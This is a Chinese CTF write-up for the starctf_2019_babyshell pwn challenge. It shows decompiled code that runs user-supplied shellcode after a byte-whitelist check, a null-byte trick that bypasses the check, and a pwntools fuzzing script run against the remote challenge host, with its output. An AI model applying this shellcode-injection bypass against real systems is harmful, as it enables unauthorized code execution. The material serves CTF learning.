buuctf starctf_2019_babyshell

今天做题时候发现一个很有意思的题目,我们输入shellcode,然后满足指定条件之后就可以执行shellcode,一般思路就是在限定条件下拼凑shellcode;但是网上有个很巧妙的方案绕过检查,之后直接使用pwntools内置的shellcode就可以拿到shell,简单记录下这个方案

checksec

checksec starctf_2019_babyshell
[*] '/home/fuzz/Desktop/ctf/starctf_2019_babyshell'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

漏洞函数

main函数如下

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  _BYTE *buf; // [rsp+0h] [rbp-10h]

  sub_4007F8();
  buf = mmap(0LL, 0x1000uLL, 7, 34, 0, 0LL);
  puts("give me shellcode, plz:");
  read(0, buf, 0x200uLL);
  if ( !(unsigned int)sub_400786(buf) )
  {
    printf("wrong shellcode!");
    exit(0);
  }
  ((void (*)(void))buf)();
  return 0LL;
}

sub_4007F8();函数是初始化的,不用管;sub_400786是检查shellcode是不是在这些内容里

__int64 __fastcall sub_400786(_BYTE *a1)
{
  const char *i; // [rsp+18h] [rbp-10h]

  while ( *a1 )
  {
    for ( i = aZzjLovesShellC; *i && *i != *a1; ++i )// ZZJ loves shell_code,and here is a gift:
      ;
    if ( !*i )
      return 0LL;
    ++a1;
  }
  return 1LL;
}

wp

参考这篇文章“汇编语言中0x00的妙用”我们可以使用0x00绕过检查函数,我们需要找到一些包含0x00的shellcode,并且这些shellcode必须不影响后续shellcode执行

link:https://blog.csdn.net/A951860555/article/details/120043354

这里介绍的方法是使用pwn disasm找到这些可用的opcode,很显然这个·004200·不是惟一的方案

pwn disasm -c amd64 004200
   0:    00 42 00                 add    BYTE PTR [rdx+0x0],  al

我们可以使用fuzz的方式测试下究竟哪些字节可以,使用下面的脚本

from pwn import*
context.arch="amd64"
success_list = []
# context(log_level='debug',arch='amd64', os='linux')
p=remote('node5.buuoj.cn',27030)
for first_byte in range(0x01, 0x100):
    try:
        pay=bytes([0x00,first_byte])+asm(shellcraft.execve("/bin/ls"))
        p.sendafter('plz:', pay)
        time.sleep(0.5)
        # p.send('ls')
        # data = p.recv()
        data2 = p.recvlines(10)
        print(f'data:{data2}')
        if b'flag' in data2:
            print(f'success:{hex(first_byte)}')
            success_list.append(first_byte)
        p.close()
    except:
        p = remote('node5.buuoj.cn', 27030)

print(f'success_list:{success_list}')

得到下面的结果

[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xca
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xcc
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xce
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xda
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xdc
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xde
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xea
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xec
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xee
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xfa
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xfc
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xfe
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done


success_list:['0x2', '0x6', '0xa', '0xe', '0x12', '0x16', '0x1a', '0x1e', '0x22', '0x26', '0x2a', '0x2e', '0x32', '0x36', '0x3a', '0x3e', '0xc0', '0xc2', '0xc4', '0xc6', '0xc8', '0xca', '0xcc', '0xce', '0xd0', '0xd2', '0xd4', '0xd6', '0xd8', '0xda', '0xdc', '0xde', '0xe0', '0xe2', '0xe4', '0xe6', '0xe8', '0xea', '0xec', '0xee', '0xf0', '0xf2', '0xf4', '0xf6', '0xf8', '0xfa', '0xfc', '0xfe']

我们再试试三字节的可用opcode

pay=bytes([0x00,first_byte, 0x00]) + asm(shellcraft.execve("/bin/ls"))

得到下面的结果

data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x42
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x45
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x46
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x47
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4f
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x52
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x55
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x56
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x57
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5f
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x62
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x65
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x66
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x67
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6f
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x72
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x75
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x76
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x77
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7f
?著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,029评论 6 493
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,238评论 3 388
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,576评论 0 349
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,214评论 1 287
  • ?港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,324评论 6 386
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,392评论 1 292
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,416评论 3 412
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,196评论 0 269
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,631评论 1 306
  • ?护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,919评论 2 328
  • ?白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,090评论 1 342
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,767评论 4 337
  • ?日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,410评论 3 322
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,090评论 0 21
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,328评论 1 267
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,952评论 2 365
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,979评论 2 351

推荐阅读更多精彩内容